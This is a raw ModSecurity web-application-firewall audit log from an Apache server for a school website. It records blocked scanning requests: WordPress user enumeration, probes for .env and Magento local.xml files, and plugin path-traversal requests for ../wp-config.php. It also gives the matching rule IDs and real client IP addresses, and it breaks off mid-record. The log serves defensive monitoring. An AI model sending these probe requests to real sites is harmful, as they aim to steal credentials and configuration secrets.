userdata_wl_content_type.||103.236.140.4|F|2"] [data "TX:0=application/dns-message"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Stopwatch: 1748729604788640 3178 (- - -) Stopwatch2: 1748729604788640 3178; combined=2084, p1=444, p2=1565, p3=21, p4=23, p5=31, sr=66, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --dfc69d21-Z-- --865e6122-A-- [01/Jun/2025:05:20:11 +0700] aDuAmwQHT18O7PnXxsQF9AAAAIk 103.236.140.4 57510 103.236.140.4 8181 --865e6122-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 45.249.78.114 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 45.249.78.114 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --865e6122-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --865e6122-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748730011965691 3145 (- - -) Stopwatch2: 1748730011965691 3145; combined=1338, p1=456, p2=846, p3=0, p4=0, p5=36, sr=84, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --865e6122-Z-- --23dbe139-A-- [01/Jun/2025:05:24:06 +0700] aDuBhgQHT18O7PnXxsQGAAAAAIU 103.236.140.4 57540 103.236.140.4 8181 --23dbe139-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 47.80.1.132 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 47.80.1.132 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --23dbe139-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --23dbe139-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748730246187456 3505 (- - -) Stopwatch2: 1748730246187456 3505; combined=1490, p1=482, p2=977, p3=0, p4=0, p5=31, sr=77, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --23dbe139-Z-- --bb12817a-A-- [01/Jun/2025:05:51:55 +0700] aDuIC-4LjVe0Eerk_ZaHlwAAAEc 103.236.140.4 57690 103.236.140.4 8181 --bb12817a-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 149.86.145.134 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 149.86.145.134 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --bb12817a-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --bb12817a-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748731915225403 3316 (- - -) Stopwatch2: 1748731915225403 3316; combined=1401, p1=472, p2=898, p3=0, p4=0, p5=31, sr=77, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --bb12817a-Z-- --75d01d0a-A-- [01/Jun/2025:05:55:05 +0700] aDuIyQQHT18O7PnXxsQGIwAAAJg 103.236.140.4 57716 103.236.140.4 8181 --75d01d0a-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 159.223.236.205 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 159.223.236.205 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0; Keydrop.io/1.0(onlyscans.com/about); Accept: */* --75d01d0a-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --75d01d0a-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1748732105744495 910 (- - -) Stopwatch2: 1748732105744495 910; combined=380, p1=339, p2=0, p3=0, p4=0, p5=41, sr=116, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --75d01d0a-Z-- --0c91772a-A-- [01/Jun/2025:05:58:04 +0700] aDuJfEaTRmdfB-FaJjm5JwAAAAs 103.236.140.4 57730 103.236.140.4 8181 --0c91772a-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 45.202.76.29 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 45.202.76.29 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --0c91772a-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --0c91772a-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748732284533593 3442 (- - -) Stopwatch2: 1748732284533593 3442; combined=1515, p1=523, p2=955, p3=0, p4=0, p5=37, sr=126, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --0c91772a-Z-- --6a4b1b53-A-- [01/Jun/2025:05:58:07 +0700] aDuJf-4LjVe0Eerk_ZaHmgAAAE4 103.236.140.4 57734 103.236.140.4 8181 --6a4b1b53-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 45.202.76.29 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 45.202.76.29 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --6a4b1b53-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --6a4b1b53-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748732287045292 2401 (- - -) Stopwatch2: 1748732287045292 2401; combined=1059, p1=382, p2=645, p3=0, p4=0, p5=32, sr=110, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --6a4b1b53-Z-- --938f5e32-A-- [01/Jun/2025:06:50:15 +0700] aDuVtwQ4kZQGAOBHoB5CkgAAANg 103.236.140.4 59368 103.236.140.4 8181 --938f5e32-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 102.164.3.136 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 102.164.3.136 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --938f5e32-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --938f5e32-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748735415494295 2796 (- - -) Stopwatch2: 1748735415494295 2796; combined=1159, p1=397, p2=738, p3=0, p4=0, p5=24, sr=58, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --938f5e32-Z-- --a2132b5d-A-- [01/Jun/2025:07:01:55 +0700] aDuYcwQHT18O7PnXxsQIUwAAAIs 103.236.140.4 59412 103.236.140.4 8181 --a2132b5d-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 200.215.161.48 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 200.215.161.48 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --a2132b5d-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --a2132b5d-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748736115527616 2749 (- - -) Stopwatch2: 1748736115527616 2749; combined=1285, p1=416, p2=839, p3=0, p4=0, p5=30, sr=76, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --a2132b5d-Z-- --097a1a3c-A-- [01/Jun/2025:07:03:59 +0700] aDuY7wQ4kZQGAOBHoB5ClgAAAMk 103.236.140.4 59414 103.236.140.4 8181 --097a1a3c-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.228.88.92 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.88.92 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --097a1a3c-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --097a1a3c-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748736239887921 3657 (- - -) Stopwatch2: 1748736239887921 3657; combined=1626, p1=568, p2=1026, p3=0, p4=0, p5=32, sr=154, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --097a1a3c-Z-- --0eb47d75-A-- [01/Jun/2025:07:04:02 +0700] aDuY8u4LjVe0Eerk_ZaH9gAAAEw 103.236.140.4 59418 103.236.140.4 8181 --0eb47d75-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.228.88.92 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.88.92 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --0eb47d75-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --0eb47d75-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748736242362692 3463 (- - -) Stopwatch2: 1748736242362692 3463; combined=1522, p1=496, p2=988, p3=0, p4=0, p5=38, sr=78, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --0eb47d75-Z-- --f6238e3d-A-- [01/Jun/2025:07:07:35 +0700] aDuZx-4LjVe0Eerk_ZaH-gAAAFQ 103.236.140.4 59458 103.236.140.4 8181 --f6238e3d-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.71.232 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.71.232 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows CE; IEMobile 8.12; MSIEMobile6.0) Accept-Charset: utf-8 --f6238e3d-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --f6238e3d-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1748736455199267 903 (- - -) Stopwatch2: 1748736455199267 903; combined=395, p1=353, p2=0, p3=0, p4=0, p5=42, sr=126, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --f6238e3d-Z-- --6f2f1c44-A-- [01/Jun/2025:07:07:40 +0700] aDuZzO4LjVe0Eerk_ZaH-wAAAFI 103.236.140.4 59460 103.236.140.4 8181 --6f2f1c44-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.71.232 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.71.232 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Linux; Android 9; Pixel) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.111 Mobile Safari/537.36 Accept-Charset: utf-8 --6f2f1c44-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --6f2f1c44-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1748736460637985 665 (- - -) Stopwatch2: 1748736460637985 665; combined=255, p1=222, p2=0, p3=0, p4=0, p5=32, sr=65, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --6f2f1c44-Z-- --75a5c47c-A-- [01/Jun/2025:07:14:27 +0700] aDubY-4LjVe0Eerk_ZaH_AAAAFM 103.236.140.4 59482 103.236.140.4 8181 --75a5c47c-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 103.133.76.20 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 103.133.76.20 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --75a5c47c-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --75a5c47c-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748736867113677 3515 (- - -) Stopwatch2: 1748736867113677 3515; combined=1547, p1=566, p2=948, p3=0, p4=0, p5=32, sr=144, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --75a5c47c-Z-- --8c61501b-A-- [01/Jun/2025:07:35:15 +0700] aDugQ-4LjVe0Eerk_ZaIAgAAAEY 103.236.140.4 59564 103.236.140.4 8181 --8c61501b-B-- GET /app/etc/local.xml HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.72.240 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.72.240 X-Forwarded-Proto: http Connection: close Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:28.0) Gecko/20100101 Firefox/72.0 Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 --8c61501b-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --8c61501b-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/app/etc/local.xml" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1748738115781890 898 (- - -) Stopwatch2: 1748738115781890 898; combined=369, p1=328, p2=0, p3=0, p4=0, p5=41, sr=80, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --8c61501b-Z-- --d5ba6a2f-A-- [01/Jun/2025:07:35:16 +0700] aDugREaTRmdfB-FaJjm5gQAAAA8 103.236.140.4 59566 103.236.140.4 8181 --d5ba6a2f-B-- GET /wp-admin/admin-ajax.php?action=duplicator_download&file=../wp-config.php HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.72.240 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.72.240 X-Forwarded-Proto: http Connection: close Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:28.0) Gecko/20100101 Firefox/72.0 Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 --d5ba6a2f-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --d5ba6a2f-H-- Message: Access denied with code 403 (phase 1). Matched phrase "wp-config.php" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1748738116139579 678 (- - -) Stopwatch2: 1748738116139579 678; combined=268, p1=235, p2=0, p3=0, p4=0, p5=33, sr=67, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --d5ba6a2f-Z-- --3deaab52-A-- [01/Jun/2025:07:35:16 +0700] aDugRAQ4kZQGAOBHoB5CpAAAAMk 103.236.140.4 59568 103.236.140.4 8181 --3deaab52-B-- GET /wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.72.240 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.72.240 X-Forwarded-Proto: http Connection: close Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:28.0) Gecko/20100101 Firefox/72.0 Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 --3deaab52-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --3deaab52-H-- Message: Access denied with code 403 (phase 1). Matched phrase "wp-config.php" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1748738116497037 28726 (- - -) Stopwatch2: 1748738116497037 28726; combined=56249, p1=251, p2=0, p3=0, p4=0, p5=28016, sr=66, sw=1, l=0, gc=27981 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --3deaab52-Z-- --df2ca260-A-- [01/Jun/2025:07:35:17 +0700] aDugRQQ4kZQGAOBHoB5CpwAAAMw 103.236.140.4 59574 103.236.140.4 8181 --df2ca260-B-- GET /blog/.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.72.240 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.72.240 X-Forwarded-Proto: http Connection: close Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:28.0) Gecko/20100101 Firefox/72.0 Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 --df2ca260-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --df2ca260-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1748738117594201 759 (- - -) Stopwatch2: 1748738117594201 759; combined=313, p1=277, p2=0, p3=0, p4=0, p5=36, sr=76, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --df2ca260-Z-- --a422ec1d-A-- [01/Jun/2025:07:35:17 +0700] aDugRUaTRmdfB-FaJjm5ggAAABE 103.236.140.4 59576 103.236.140.4 8181 --a422ec1d-B-- GET /admin/.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.72.240 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 